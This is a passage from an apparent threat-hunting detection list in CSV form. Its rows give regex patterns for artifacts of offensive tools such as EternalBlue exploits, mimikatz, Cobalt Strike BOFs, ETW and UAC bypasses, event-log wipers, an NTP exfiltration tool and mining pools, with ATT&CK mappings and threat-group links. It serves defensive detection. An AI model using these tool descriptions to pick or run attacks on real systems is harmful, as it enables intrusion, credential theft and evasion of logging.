tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43273" 
"*eternalblue_kshellcode_x64.asm*",".{0,1000}eternalblue_kshellcode_x64\.asm.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43274" "*eternalblue_kshellcode_x86.asm*",".{0,1000}eternalblue_kshellcode_x86\.asm.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43275" "*eternalblue_poc.py*",".{0,1000}eternalblue_poc\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43276" "*eternalblue_sc_merge.py*",".{0,1000}eternalblue_sc_merge\.py.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","1","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","43277" "*Eternalblue-Doublepulsar*",".{0,1000}Eternalblue\-Doublepulsar.{0,1000}","offensive_tool_keyword","Eternalblue-Doublepulsar-Metasploit","doublepulsa vulnerability exploit DoublePulsar is a backdoor implant tool developed by the U.S. 
National Security Agency's (NSA) Equation Group that was leaked by The Shadow Brokers in early 2017.[3] The tool infected more than 200.000 Microsoft Windows computers in only a few weeks.[4][5][3][6][7] and was used alongside EternalBlue in the May 2017 WannaCry ransomware attack.[8][9][10] A variant of DoublePulsar was first seen in the wild in March 2016. as discovered by Symantec. [11]","T1055 - T1218","TA0002 - TA0003","N/A","APT15 - Calypso - Equation Group","Exploitation tool","https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit","1","1","N/A","N/A","N/A","10","1115","520","2021-03-31T09:44:10Z","2017-04-24T12:41:56Z","43278" "*EternalHushFramework-*-SNAPSHOT.jar*",".{0,1000}EternalHushFramework\-.{0,1000}\-SNAPSHOT\.jar.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","43279" "*EternalHushFramework-main*",".{0,1000}EternalHushFramework\-main.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","43280" "*EternalHushMain.java*",".{0,1000}EternalHushMain\.java.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","43281" "*EternalHushWindow.java*",".{0,1000}EternalHushWindow\.java.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","43282" "*ethereum2john.py*",".{0,1000}ethereum2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43283" "*etw-bypass*",".{0,1000}etw\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","43284" "*ETWEventSubscription*Program.cs*",".{0,1000}ETWEventSubscription.{0,1000}Program\.cs.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages 
Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","43285" "*ETWEventSubscription.exe* -ProcStart *",".{0,1000}ETWEventSubscription\.exe.{0,1000}\s\-ProcStart\s.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","43286" "*ETWEventSubscription.exe* -UserLogon*",".{0,1000}ETWEventSubscription\.exe.{0,1000}\s\-UserLogon.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","43287" "*etw-fuck.exe *",".{0,1000}etw\-fuck\.exe\s.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","43288" "*EtwHash.exe*",".{0,1000}EtwHash\.exe.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","43289" "*EtwHash.git*",".{0,1000}EtwHash\.git.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","43290" "*ETWHash.sln*",".{0,1000}ETWHash\.sln.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","43291" "*etwti-hook.*",".{0,1000}etwti\-hook\..{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - 
T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43292" "*eu.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}eu\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","43293" "*eu1-etc.ethermine.org*",".{0,1000}eu1\-etc\.ethermine\.org.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","43294" "*europe.equihash-hub.miningpoolhub.com*",".{0,1000}europe\.equihash\-hub\.miningpoolhub\.com.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","43296" "*eval $zrKcKQ*",".{0,1000}eval\s\$zrKcKQ.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","N/A","rule author: @cyb3rops - 
link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A","43298" "*evallen/ntpescape*",".{0,1000}evallen\/ntpescape.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","43300" "*evasion/has_recycle_bin.*",".{0,1000}evasion\/has_recycle_bin\..{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","43302" "*evasion_shellcode.js*",".{0,1000}evasion_shellcode\.js.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43303" "*event::drop*",".{0,1000}event\:\:drop.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation 
tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","43304" "*EventAggregation.dll.bak*",".{0,1000}EventAggregation\.dll\.bak.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combines it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","43305" "*EventAggregation.dll.bak*",".{0,1000}EventAggregation\.dll\.bak.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","43306" "*EventAggregation.dll.patched*",".{0,1000}EventAggregation\.dll\.patched.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified 
process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","43307" "*EventAggregationPH.dll*",".{0,1000}EventAggregationPH\.dll.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","43308" "*eventcleaner closehandle*",".{0,1000}eventcleaner\sclosehandle.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","43309" "*eventcleaner suspend*",".{0,1000}eventcleaner\ssuspend.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","43310" "*EventCleaner.exe *",".{0,1000}EventCleaner\.exe\s.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","43311" "*EventCleaner.iobj*",".{0,1000}EventCleaner\.iobj.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","43312" "*EventCleaner\Debug\*",".{0,1000}EventCleaner\\Debug\\.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","43313" "*eventlog -risk-i-know*",".{0,1000}eventlog\s\-risk\-i\-know.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","43314" "*eventlog_dos.exe*",".{0,1000}eventlog_dos\.exe.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","43315" "*eventlog_fucker.py*",".{0,1000}eventlog_fucker\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","43316" "*EventLogCrasher.exe*",".{0,1000}EventLogCrasher\.exe.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","43317" "*EventLogCrasher-main*",".{0,1000}EventLogCrasher\-main.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","43318" "*Eventlogedit-evtx--Evolution-master-v1.1.zip*",".{0,1000}Eventlogedit\-evtx\-\-Evolution\-master\-v1\.1\.zip.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","1","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","43319" "*eventlog-fucker.py*",".{0,1000}eventlog\-fucker\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","43320" "*eventspy.cna*",".{0,1000}eventspy\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","43321" "*EventSub-Aggressor.*",".{0,1000}EventSub\-Aggressor\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and 
cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","43322" "*EventViewerRCE.ps1*",".{0,1000}EventViewerRCE\.ps1.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","43323" 
"*EventViewerUAC.*",".{0,1000}EventViewerUAC\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","43324" "*EventViewerUAC.*",".{0,1000}EventViewerUAC\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
